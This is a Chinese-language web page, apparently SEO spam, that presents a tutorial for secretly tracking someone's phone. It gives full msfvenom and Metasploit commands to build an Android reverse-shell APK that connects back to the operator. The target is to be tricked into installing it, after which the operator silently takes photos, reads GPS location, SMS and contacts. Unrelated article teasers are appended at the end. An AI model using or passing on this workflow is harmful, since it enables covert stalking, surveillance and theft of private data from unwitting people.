手机定位录音追踪软件(不被对方察觉手机定位)大多数情况下,安卓手机在安装了恶意程序后,或多或少都会被远控,那么攻击者在后台通过指令获取目标安卓手机的远程静默拍照、录像、录音、定位、获取通讯录和短信真的是不在话下了,下文我们就来探讨下这种技术。
Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。
比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的 *** 。
kali终端下输入:
msfvenom -h 查看使用帮助
手机定位录音追踪软件(不被对方察觉手机定位)其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)
msfvenom -l payload *** sfvenom -l formats
生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk
这里没有使用-f参数,生成安卓可执行程序,可以不用。
部署可执行程序
将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。
启动msf
Kali终端下输入:msfconsole
继续输入:
use exploit/multi/handler
本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。
为该模块设置参数:
show optionsset LHOST 192.168.31.111set lport 8888
这里的设置必须和前面用msfvenom的设置保持一致。
run执行侦听,等待上线
得到meterpreter会话
一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。
输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:
远程拍照:目标手机不会有任何察觉,属于后台系统拍照;
gps定位:直接显示经纬度地理位置,非常精准;
查看短信与通讯录;
我们在接触客户的过程中,经常有客户问询营销型网站与传统企业网站的不同点有哪些。 1、两者的建站目的不一样 普通的企业网站目的是展示公司的介绍和产品信息,选择这类网站的企业,建站目的是希望在互联网上...
春节的时候一般大家都会走亲访友,而对于外地的亲戚来说,都会开车去比较方便。那么很多人就要问了 2020 年春节高速免费是什么时间 ? 下面来看一下。 2020 年春节高速免费通行最新时间表...
人人好,我是你们的老朋友:大兔,我已经在这个博客分享过两篇文章了,分别是《 为什么人人愿意来小兔的“免费赚钱中央”?》和《独家揭秘“免费赚钱中央”的线报从那里获得的?》两篇吹嘘小兔的水文,不外今天我想...
自从我承担起一个项目的负责人后,原本没有规律的生活现在更变的没有头绪了........时间的因素决定了自己无法去做一些想做的事情。但是有些时候又不得不去做一些不想做的事情。。。。。。 得到一个MAIL...
本文目录一览: 1、《唐人街探案2》女黑客是谁? 2、唐人街探案2当中的女黑客KIKO是谁演的 3、《唐人街探案》二里那个女黑客是谁演的? 4、《唐人街探案2》女黑客是谁? 5、《唐人...
本文导读目录: 1、广西18岁黑客阿叶盗刷信用卡那个案件一般会判多少年,他同时被抓的那名小弟又会被判多久? 2、9·18中国红客联盟攻击日本网络事件的事件简介 3、有一部外国电影!黑客侵入交通...